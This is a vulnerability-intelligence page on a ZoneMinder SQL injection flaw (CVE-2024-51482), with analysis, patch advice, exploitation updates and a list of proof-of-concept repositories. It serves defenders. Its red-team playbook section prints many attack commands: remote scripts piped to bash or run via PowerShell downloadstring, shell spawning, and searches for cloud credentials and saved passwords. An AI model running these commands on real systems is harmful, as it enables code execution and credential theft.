CVE-2024-51482
Overview
This vulnerability is a boolean-based SQL Injection affecting ZoneMinder's web application component. The root cause lies in improper sanitization of user-supplied input in the AJAX handler located at web/ajax/event.php, which allows crafted queries to manipulate the underlying SQL statements. The affected feature is the event handling functionality within ZoneMinder versions up to and including 1.37.64.
Vulnerability Description
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
Impact
An attacker with authenticated access can exploit this vulnerability to execute arbitrary SQL commands with high impact on confidentiality, integrity, and availability, as indicated by the CVSS vector (C:H/I:H/A:H). This can lead to unauthorized data disclosure, data manipulation, or denial of service within the ZoneMinder application. The attack requires network access and authenticated user privileges but no user interaction, enabling potential lateral movement or compromise of surveillance data.
Solution
Upgrade ZoneMinder to version 1.37.65 or later, where this SQL Injection vulnerability is resolved. Refer to the official GitHub security advisory GHSA-qm8h-3xvf-m7j3 and the patch commit 9e7d31841ed9678a7dd06869037686fc9925e59f for detailed remediation instructions. No additional workarounds are documented; applying the vendor-provided patch is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in ZoneMinder versions up to 1.37.64 is characterized as a boolean-based SQL Injection flaw located in the web/ajax/event.php function. This type of vulnerability allows an attacker to manipulate SQL queries by injecting malicious input, which can lead to unauthorized access to the database. The flaw arises from insufficient input validation, enabling attackers to craft specific requests that alter the logic of SQL statements executed by the application. When exploited, this vulnerability can allow attackers to retrieve sensitive data, modify database entries, or even execute administrative operations on the database, depending on the permissions associated with the database user.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving crafted HTTP requests sent to the ZoneMinder application. An attacker could utilize tools such as SQLMap or Burp Suite to automate the injection process, making it easier to identify and exploit the vulnerability. For instance, by manipulating parameters in the AJAX requests, an attacker could potentially gain access to user credentials, surveillance footage, or other sensitive information stored in the database. Furthermore, the boolean-based nature of the SQL injection allows for a stealthy approach, as attackers can infer the existence of data without directly exposing their intentions, making detection more challenging.
The real-world impact of this vulnerability is significant, particularly for organizations relying on ZoneMinder for surveillance and security purposes. A successful attack could lead to the exposure of sensitive video feeds, user data, and system configurations, posing severe risks to privacy and security. For businesses, the consequences may include reputational damage, loss of customer trust, and potential legal ramifications if sensitive data is compromised. Additionally, the high CVSS score of 9.9 indicates that this vulnerability poses a critical risk, necessitating immediate attention from organizations utilizing the affected software.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize updating to the patched version of ZoneMinder (1.37.65 or later). Regularly applying security updates and patches is a fundamental practice in maintaining a secure environment. Additionally, implementing web application firewalls (WAFs) can help filter out malicious traffic and prevent SQL injection attempts. Organizations should also conduct regular security assessments, including penetration testing and vulnerability scanning, to identify and remediate potential weaknesses in their applications. Furthermore, employing input validation and sanitization techniques within the application can significantly reduce the risk of SQL injection attacks.
In conclusion, the boolean-based SQL Injection vulnerability in ZoneMinder represents a critical threat to organizations utilizing this surveillance software. The potential for unauthorized access to sensitive data and the associated business risks underscore the importance of proactive security measures. By keeping software up to date, employing robust security practices, and fostering a culture of security awareness, organizations can mitigate the risks posed by such vulnerabilities and protect their assets from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the boolean-based SQL Injection vulnerability in ZoneMinder (CVE-2024-51482). This increase in activity coincides with the emergence of several new proof-of-concept exploits publicly available on GitHub, which demonstrate enhanced reliability and automation in exploiting the flaw. Our telemetry indicates that adversaries are leveraging these tools to conduct more frequent and sophisticated attacks, raising the likelihood of successful compromise in unpatched environments. Although the EPSS score remains stable, the sharp rise in observed exploitation attempts elevates the practical risk to organizations still running vulnerable versions of ZoneMinder. This development underscores an urgent need for defenders to reassess their exposure, as the availability of diverse, well-documented exploit code lowers the barrier to entry for threat actors, including opportunistic attackers and potentially more advanced groups. Consequently, the threat level associated with CVE-2024-51482 should be considered heightened due to increased attacker activity and improved exploit capabilities.
Update 2 — July 19, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-51482, accompanied by the emergence of several new, sophisticated proof-of-concept exploits that enhance attack reliability and automation. These developments indicate that adversaries are refining their operational capabilities, leveraging more efficient time-based blind SQL injection techniques that reduce error rates and enable automated data extraction. Our telemetry also shows that these advanced tools are gaining traction within attacker communities, broadening the exploit landscape beyond initial proof-of-concept releases. This evolution significantly lowers the technical barrier for exploitation, increasing the likelihood of opportunistic and less skilled actors successfully compromising vulnerable ZoneMinder deployments. Consequently, the threat level associated with CVE-2024-51482 has intensified, as the combination of increased attacker activity and improved exploit sophistication elevates the risk to organizations that have not yet applied the critical patch.
Update 3 — August 05, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-51482, consistent with a modest rise in attacker engagement. Although the EPSS score has marginally declined, indicating a subtle decrease in predicted exploit likelihood, the continued emergence and refinement of publicly available proof-of-concept tools sustain a persistent exploitation risk. Our telemetry shows attackers increasingly leveraging more reliable and automated SQL injection scripts, which lowers the technical barrier and accelerates attack execution. This dynamic suggests that while broad-scale exploitation has not surged dramatically, the quality and accessibility of exploit methods are improving, enabling a wider range of threat actors to attempt compromise. Consequently, the threat level remains elevated, underscoring the ongoing urgency for defenders to prioritize patching and monitoring efforts around vulnerable ZoneMinder instances.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (10)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
plur1bu5/CVE-2024-51482-PoC
Authenticated time-based blind SQL injection PoC for ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)
|
plur1bu5 | 14 | 0 | 2026-03-07 | View |
|
BridgerAlderson/CVE-2024-51482
ZenoMinder Blind SQL Injection PoC
|
BridgerAlderson | 8 | 0 | 2026-03-08 | View |
|
0xDaeras/CVE-2024-51482-POC
Time-based SQL injection PoC for CVE-2024-51482 in ZoneMinder, with reproducible Docker lab and automated data extractio...
|
0xDaeras | 7 | 0 | 2026-04-28 | View |
|
BwithE/CVE-2024-51482
CVE-2024-51482 ZoneMinder v1.37.* <= 1.37.64 poc
|
BwithE | 1 | 2 | 2025-06-07 | View |
|
c0gnit00/CVE-2024-51482
CVE-2025-51482 POC, Dump Credentials From zm.Users
|
c0gnit00 | 0 | 0 | 2026-07-10 | View |
|
mattiapertusati/htb-cctv
HackTheBox — CCTV (Easy/Linux) | CVE-2024-51482 + SqlMap+ SSH Key + Root
|
mattiapertusati | 0 | 0 | 2026-04-30 | View |
|
Revnin/CCTV-MACHINE
A black box penetration test on HackTheBox's CCTV machine achieving full root compromise via four vulnerabilities: defau...
|
Revnin | 0 | 0 | 2026-04-26 | View |
|
Erhui-Li/CVE-2024-51482-ZoneMinder-CCTV-HTB-Reliable-EXP
Performing multiple time-based blind injections for the same character and selecting the most frequent result significan...
|
Erhui-Li | 0 | 0 | 2026-03-19 | View |
|
lnn0v4/sqli-hunter-CVE-2024-51482-PoC
Scripts en Python para la explotación de CVE-2024-51482 (SQLi en ZoneMinder) — HTB CCTV
|
lnn0v4 | 0 | 0 | 2026-03-11 | View |
|
Ravi-lk/CVE-2024-51482-ZoneMinder-v1.37.-1.37.64-SQL-Injection-POC
ZoneMinder Time-Based SQL Injection (CVE-2024-51482) Exploit POC
|
Ravi-lk | 0 | 0 | 2026-03-08 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-51482 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ZoneMinder/zoneminder/commit/9e7d31841ed9678a7dd06869037686fc9925e59f |